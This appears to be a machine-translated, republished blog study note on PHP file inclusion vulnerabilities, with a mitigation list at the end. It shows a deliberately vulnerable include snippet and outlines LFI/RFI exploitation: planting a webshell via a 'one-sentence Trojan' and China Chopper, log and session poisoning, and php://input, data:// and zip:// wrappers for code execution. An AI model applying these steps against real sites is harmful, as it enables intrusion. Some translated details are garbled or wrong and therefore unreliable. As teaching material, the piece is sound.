File Containment Vulnerability-2023/03/18-19

Enterprise 2024-01-09 04:10:22 views: null

2023/03/18-19

6. File contains vulnerabilities

Detailed explanation of web vulnerability file inclusion vulnerability

A comprehensive explanation of the file inclusion vulnerability_What is a file inclusion vulnerability_caker丶's blog-CSDN blog

1) Causes of file inclusion vulnerabilities:

A type of code injection, injecting a script or code that can be controlled by the user and letting the server execute it. File inclusion may include jsp, php, asp and other languages. When the server uses a function to include any file, due to the included The source of the file is not strictly filtered, so it can contain a malicious file, and we can construct this malicious file to achieve evil purposes.

Common functions contained in files are as follows:

PHP:include() 、include_once()、require()、require_once()、fopen()、readfile()

JSP/Servlet:ava.io.file()、java.io.filereader()

ASP:include file、include virtual

  • Include: Include and run the specified file. When an error occurs when including an external file, the system will give a warning, but the entire php file will continue to execute.
  • Require: The only difference from include is that when an error occurs, include will continue to run and require will stop running.
  • Include_once: This function has almost the same effect as the include function, except that it checks whether the file has been imported before importing the function. If it has been executed once, it will not be executed again.
  • Require_once: This function has almost the same effect as the require function, and is similar to include_once and include.
  • php.ini configuration file: allow_url_fopen=off means remote files cannot be included. There are remote include & local include for php4, and only local include for php5.

When a file is included using the above functions, the file will be executed as PHP code, and the PHP kernel does not care what type of file is included. That is to say, when we use these functions to include .jpg files, they will also be executed as php files.

The include() function does not care what type of file is included. As long as there is PHP code, it will be parsed.

2) Why include files:

Common code is written in a separate file, and other files need to be included and called when needed.

if ($_GET[page]) {
    include $_GET[page];
} else {
    include "home.php";
}

1. Submit the above URL and obtain the value of this page ($_GET[page]) in index.php.

2. Determine whether $_GET[page] is empty. If not (here is main.php), use include to include this file.

3. If $_GET[page] is empty, execute else to include the file “home.php”.

3) How to exploit vulnerabilities:

  1. Locally included LTI

Vulnerabilities that can open and include local files are called local file inclusion vulnerabilities (LFI).

Local inclusion conditions:

  • allow_url_fopen =On
  • Users can dynamically control variables

http://hi.baidu.com/m4r10/php/index.php?page=hello.php

When there is no hello.php file, a warning will be given, and the warning will expose the corresponding absolute path.

  • Through such code, some sensitive information local to the system can be read

Insert image description here

If the target host does not have strict permission restrictions, or the permissions to start Apache are relatively high, the contents of this file can be read. Otherwise, you will get a Warning similar to: open_basedir restriction in effect.

If we can upload a file, we can upload a one-sentence Trojan, then include the one-sentence Trojan, and then use a kitchen knife to connect to the Webshell of the website.

4) LFI vulnerability exploitation skills

  • Contains files uploaded by users (one-sentence Trojans we uploaded, etc.)
  • Contains pseudo protocols such as data:// or php://input
  • Contains Session files
  • Contain the log file, make the server report an error by constructing a statement and write a sentence to the log along with the error message; find the path to the log file and include this file; connect with a kitchen knife; get the Webshell of the website)

5) Remotely containing vulnerability RFI

Remote inclusion conditions:

  1. allow_url_include=On allow_url_fopen=On
  2. Users can dynamically control variables.

6) PHP pseudo-protocol

Insert image description here

  1. file:// protocol:

file:// is used to access the local file system and read local files, and is not affected by allow_url_fopen and allow_url_include.

Usage: file://[absolute path and file name of the file]

  1. php:// protocol:

php:// accesses various input/output streams (I/O streams). php://filter and php://input are often used.

  • php://filter: Read the source code and perform base64 encoding and output. Otherwise, it will be executed directly as PHP code and the source code content will not be visible.

    [External link image transfer failed. The source site may have an anti-leeching mechanism. It is recommended to save the image and upload it directly (img-LfqfWo9U-1679235700892)(https://s3-us-west-2.amazonaws.com/secure.notion -static.com/da886a34-d6f2-47d1-b674-253176b4e2ea/Untitled.png)]

  • php://input: A read-only stream that can access the original data of the request, and execute the data in the post request as php code. You can set the parameter to php://input, and at the same time post the file content you want to set, when php is executed The post content will be treated as file content. This can lead to arbitrary code execution.

    [External link image transfer failed. The source site may have an anti-leeching mechanism. It is recommended to save the image and upload it directly (img-Nlerl8Bp-1679235700893)(https://s3-us-west-2.amazonaws.com/secure.notion -static.com/acb8253f-33a2-4afd-8595-b5be0aec385d/Untitled.png)]

  1. ZIP:// protocol:

zip:// can access the files in the compressed package. When it is combined with the include function, the zip:// stream will be executed as a php file, thereby enabling the execution of arbitrary code.

  1. data://protocol:

Similar to php://input, it allows users to control the input stream. When it is combined with the include function, the data:// stream entered by the user will be executed as a PHP file. This can lead to arbitrary code execution.

7) File contains vulnerability protection

1. Use str_replace and other methods to filter out dangerous characters

2. Configure open_basedir to prevent directory traversal (open_basedir limits the files that php can open to the specified directory tree)

3. PHP version upgrade to prevent %00 truncation

4. Rename the uploaded file to prevent it from being read.

5. You can set a whitelist for dynamically included files, and do not read non-whitelisted files.

6. Divide administrator permissions, manage file permissions, and minimize permissions for allow_url_include and allow_url_fopen.

Guess you like

Origin blog.csdn.net/m0_53689197/article/details/129657866
Recommended
Ranking
#2019110700005
What materials and procedures are required for patent transfer
What is the blockchain Ethereum triplet state root transaction root receipt root
Front-end study notes 04 --- About the insertion of html pictures and videos
Documents required for the filing of WeChat Mini Programs in special industries, the filing process of WeChat Mini Programs in special industries, how to file WeChat Mini Programs in special industries
2017 Qingdao-site tournament I The Squared Mosquito Coil
[BZOJ3165][HEOI2013]Segment (line segment tree without marking)
Kettle series: KettleEasyExpand, an open source Kettle universal plugin by Ma Jinju
The latest tutorial on making framework for iOS
DAX Section 6: Statistical Functions
Daily
More
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)

Code World

© 2018 codetd.com